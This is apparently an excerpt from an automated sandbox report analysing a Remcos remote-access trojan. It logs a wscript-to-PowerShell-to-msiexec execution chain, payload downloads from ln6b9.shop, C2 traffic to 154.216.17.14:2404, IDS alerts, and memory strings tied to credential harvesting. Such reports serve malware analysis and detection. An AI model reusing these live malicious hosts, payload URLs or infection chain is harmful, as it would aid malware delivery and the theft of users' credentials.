              Source: Binary string: m.Core.pdbq source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 0000000D.00000002.2629463752.0000000002A4A000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_223210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_223210F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22326580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,7_2_22326580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49915 -> 154.216.17.14:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49926 -> 154.216.17.14:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 154.216.17.14
              Source: global trafficTCP traffic: 192.168.2.6:49915 -> 154.216.17.14:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49893 -> 104.21.2.6:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49927 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /IBodHWPw/Kokkerering.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ln6b9.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /NrFLrAda/NwiqNYffVolUqcmi160.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ln6b9.shopCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: global trafficHTTP traffic detected: GET /IBodHWPw/Kokkerering.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ln6b9.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /NrFLrAda/NwiqNYffVolUqcmi160.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ln6b9.shopCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000A.00000002.2643859057.0000000004889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000A.00000002.2643859057.0000000004889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: ln6b9.shop
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhvF097.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhvF097.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvF097.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp1
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpxes
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy2
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE71F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2303486839.000001ACE57D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2303486839.000001ACE6B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE57D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/IBodHWPw/Kokkerering.ocxP
              Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/IBodHWPw/Kokkerering.ocxXR
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin0JdY
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.binK
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bins
              Source: powershell.exe, 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvF097.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvF097.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvF097.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhvF097.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhvF097.tmp.10.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE55B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2467560447.0000000004381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: bhvF097.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvF097.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617219052.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617410660.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2619527438.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617386032.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 0000000E.00000003.2617219052.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617410660.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2619527438.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617386032.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
              Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 0000000A.00000002.2643350268.00000000029C4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhvF097.tmp.10.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
              Source: bhvF097.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhvF097.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhvF097.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhvF097.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhvF097.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE55B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2467560447.0000000004381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: bhvF097.tmp.10.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhvF097.tmp.10.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
              Source: bhvF097.tmp.10.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: bhvF097.tmp.10.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhvF097.tmp.10.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvF097.tmp.10.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
              Source: bhvF097.tmp.10.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
              Source: bhvF097.tmp.10.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
              Source: bhvF097.tmp.10.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
              Source: bhvF097.tmp.10.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
              Source: bhvF097.tmp.10.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
              Source: bhvF097.tmp.10.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
              Source: bhvF097.tmp.10.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhvF097.tmp.10.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE6115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: bhvF097.tmp.10.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhvF097.tmp.10.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhvF097.tmp.10.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvF097.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhvF097.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhvF097.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: powershell.exe, 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: bhvF097.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhvF097.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
              Source: bhvF097.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
              Source: bhvF097.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
              Source: bhvF097.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
